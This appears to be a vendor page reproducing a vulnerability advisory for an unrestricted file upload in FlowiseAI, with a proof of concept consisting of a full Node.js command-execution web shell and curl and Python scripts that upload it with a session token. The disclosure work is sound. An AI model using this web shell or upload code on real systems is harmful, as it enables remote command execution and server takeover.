Launch Week Day 1: Announcing Security Design Review
Start for Free
HIGH 8.3 npm

FlowiseAI/Flosise has File Upload vulnerability

GHSA-35g6-rrw3-v6xc · CVE-2025-61687

Published · Modified

Description

Summary

A file upload vulnerability in FlowiseAI allows authenticated users to upload arbitrary files without proper validation. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE).

Details

The system fails to validate file extensions, MIME types, or file content during uploads. As a result, malicious scripts such as Node.js-based web shells can be uploaded and stored persistently on the server. These shells expose HTTP endpoints capable of executing arbitrary commands if triggered.

The uploaded shell does not automatically execute, but its presence allows future exploitation via administrator error or chained vulnerabilities.

Taint Flow

PoC

shell.js (Node.js Web Shell)

const { exec } = require('child_process');
const http = require('http');

const server = http.createServer((req, res) => {
    const url = new URL(req.url, 'http://localhost');
    const cmd = url.searchParams.get('cmd');

    if (cmd) {
        console.log(`Executing: ${cmd}`);
        exec(cmd, (error, stdout, stderr) => {
            res.writeHead(200, {'Content-Type': 'text/plain'});
            if (error) {
                res.end(`Error: ${error.message}\n${stderr || ''}`);
            } else {
                res.end(stdout || 'Command executed successfully');
            }
        });
    } else {
        res.writeHead(200, {'Content-Type': 'text/html'});
        res.end(`
            <h1>Node.js Web Shell</h1>
            <p>Use ?cmd=command to execute</p>
            <p>Example: ?cmd=id</p>
        `);
    }
});

const PORT = 8888;
server.listen(PORT, '0.0.0.0', () => {
    console.log(`Shell running on port ${PORT}`);
    console.log(`Access: http://localhost:${PORT}?cmd=id`);
});

curl Upload

curl -X POST "http://localhost:3000/api/v1/attachments/0237eefc-18c5-46b2-8b3c-97aa516133fc/$(uuidgen)" \
  -H "Cookie: jwt=ppBk33uGXmJmoj8zIAGgHOP-oQfb2b8yds7XQfqyRl0" \
  -F "files=@shell.js;type=application/javascript"

Python Upload Script

import requests
import uuid

TARGET_URL = "http://localhost:3000"
CHATFLOW_ID = "0237eefc-18c5-46b2-8b3c-97aa516133fc"
TOKEN = "ppBk33uGXmJmoj8zIAGgHOP-oQfb2b8yds7XQfqyRl0"
CHAT_ID = str(uuid.uuid4())

def upload_shell():
    url = f"{TARGET_URL}/api/v1/attachments/{CHATFLOW_ID}/{CHAT_ID}"
    headers = {'Cookie': f'jwt={TOKEN}'}
    files = {'files': ('shell.js', open('shell.js', 'rb'), 'application/javascript')}
    r = requests.post(url, headers=headers, files=files)

    if r.status_code == 200:
        print("[✓] Upload success")
        print(r.text)
    else:
        print(f"[✗] Upload failed ({r.status_code})")
        print(r.text)

if __name__ == "__main__":
    upload_shell()
image

Impact

An attacker can persistently upload and store malicious web shells on the server. If executed, this leads to Remote Code Execution (RCE). The risk increases if administrators unknowingly trigger the shell or if other vulnerabilities are chained to execute the file. This presents a high-severity threat to system integrity and confidentiality.

References

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes